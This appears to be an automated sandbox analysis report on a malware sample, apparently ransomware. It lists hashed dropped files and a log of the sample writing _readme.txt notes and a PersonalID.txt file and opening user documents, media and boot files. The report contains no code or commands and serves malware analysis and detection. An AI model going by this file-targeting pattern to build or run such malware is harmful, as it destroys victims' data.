C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	568.17 KB	MD5: 441851253deb203512374f4a829f8191 SHA1: 91ef477c2a9f122d50452d175781edf99c628018 SHA256: 7e26b0d003c7e4eebb3a10df20d209366966c4438dc8c28baea7975fc803691b SSDeep: 12288:i0sXgJb0gYY4hyMPezVNK9TcS5RyjDUI6Eh/MOhTK:i0sGIsMPgyTx6jDUbE2I+	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	181.08 KB	MD5: da50986b7878ed3a21683dec1c497215 SHA1: 8a3b84bec8b0e0f53e331832c305c7d1efa09414 SHA256: 638dc3589bf17c13e668be0c0d2e5c679e76d8fec7eddfdd13aef7f6ce97e40b SSDeep: 3072:01AoM/jclaA7fW9SVVUWiz0JD+/MWOLEkaXWtPgjnnZpfez4Vd8OIbSw0kUQqGa:kHM/YlaAjYS0pQOMTLGmtP844VdyHpjq	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	797 bytes	MD5: 99517bcabe43f3c4716aff42c921a844 SHA1: 2d684aebbefe48368ab04148f6bda3fb26ce4b13 SHA256: 2d7cc7ba82ab086caeff2532e9526cc7bc974ed4738c287633ff9103562f9fa2 SSDeep: 24:FLT8raM04r5YuLskGy6V5yOCmDF+XdsSE1bD:NIWM04rKuADy6hYXdsFlD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	24.17 MB	MD5: cc0cf3adf2b3c4435de51c511fee3c46 SHA1: 9957c02e8fc33412d4d9e3c1300765dc0c0d872d SHA256: 362678953923af00a35ddb67d011411276e0181fd610d7f8b864cfe9e221608a SSDeep: 196608:rWdNm7l//upum9uxpfp4uZ8q7zEqaZswqLhQTcvlj9/z2H7DLKH8:Vl//upum9QtEqaeqc3/iH3mH8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	885.58 KB	MD5: fb1d7045d37918e643edd109b6bbe7d1 SHA1: 30c861e7b52f85bb1d25b83fb365951665cffbdc SHA256: 68c203c9098f1d3ab90e8d75a28e3895fc4ad31018a8be1fee4736f751237bf1 SSDeep: 6144:rlKMQDYPQOJkBJ3rwVPYGj2QELvMYI2q3ksedyPs3ETGpyIQEkmt3PNXMRiWRw:MMQDOQDEYnikseAPsJpfjt3PES	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	91 bytes	MD5: b39652259aa663c16163b1d461dbc0a8 SHA1: 5fb5d6618630140c02b47fb1d039acff5ee6b96b SHA256: 0c556633cfe05a445e7f1670d7316b560b9c403b18dbc6074e27848d36777c0b SSDeep: 3:DqeaRqxhabt1bkVNZ2CORUVdncIFiRHIgHaRT:BHvZ73cii96Z	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	914 bytes	MD5: 0c760b1b283c4f8851ac186dbb4201a4 SHA1: 766d5e9992fd289273d61607276c7eaffac6dcf5 SHA256: 950925cc708311017e32fe84cd12af46dc3d0158839abdee024484814bd68cd4 SSDeep: 24:BynrWQWIfgQmy5yU+9U01X0XRrfiQLLfJNUDYv1bD:BKrWQWIoQmy5yUQhEwQLLfzjlD	... File Actions Show Properties Download

Host Behavior

File (1801)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\SystemID\PersonalID.txt	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\SystemID\PersonalID.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Boot\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Config.Msi\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\cs-CZ\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\da-DK\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\de-DE\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\el-GR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\en-US\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\es-ES\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\fi-FI\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\Fonts\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\fr-FR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\hu-HU\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\it-IT\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\ja-JP\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\ko-KR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\nb-NO\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\nl-NL\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\pl-PL\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\pt-BR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\pt-PT\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\ru-RU\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\sv-SE\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\tr-TR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\zh-CN\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\zh-HK\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\zh-TW\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\BOOTSECT.BAK	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BCD.LOG	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BCD.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BCD.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BOOTSTAT.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\memtest.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\cs-CZ\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\da-DK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\de-DE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\el-GR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\en-US\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\en-US\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\es-ES\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\fi-FI\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\chs_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\cht_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\jpn_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\kor_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\wgl4_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\fr-FR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\hu-HU\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\it-IT\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\ja-JP\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\ko-KR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\nb-NO\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\nl-NL\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\pl-PL\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\pt-BR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\pt-PT\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\ru-RU\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\sv-SE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\tr-TR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\zh-CN\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\zh-HK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\zh-TW\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2l ht.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\496tLHemB5Lzkb7xCb7M.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bljvKKc.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bWkYr4TM2TfL3vpMnJ.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c6jIP57RiiMG8.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CFtrxYI4ehxro.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CVd8AGKl82socUEV.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EFVz.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gI1Ph3odyc3WWitg.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\HDxPsHkhhG.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\i1wOhL3vMDC.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ig-pKA.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iPCx0KzGTdc.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KRom7uq2QFi.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\msHzUMaVeyMhZg.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\oYQm89fmHM2V.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\plOBtmmjgx5C31gv7.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qW ivUaVqr_On1.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Rboqf3f1pV5M.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t9PlAeBS-2DXgBXz.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uRUwiXJup.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VDarx005qh2__sirr.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\y7SdTqWYI32_I2EQyR.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yg8 kLfurYIaQM697h.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zDvwnZ.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-G9kfPr.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\15jZzXpvGAgxYF0U.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\29xL.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5BThH.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5eEgQJA.doc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\6agqO0CE.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7Cdo.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\A8Lf.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ApjV0L.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRr UxgKvk lgV DA.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dlmumiy0mdd o.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\E9c6yerqTjnAvgifiGH.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\e9_rdw 0S48c8wWGxtcZ.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\F66QZsvCIiq3.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\FT5DlVKU9skfgHqGxmUn.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\g61yn2 WbDs1g.odp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GaPuN558 zq.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gdzkVlfc2.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ii08Wr6qQ2it.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\INx_XXf1fj2VzxVM7GZ.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Jmoep.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\lZ7mFKQ3H.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\MiOR3NQChO8s.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
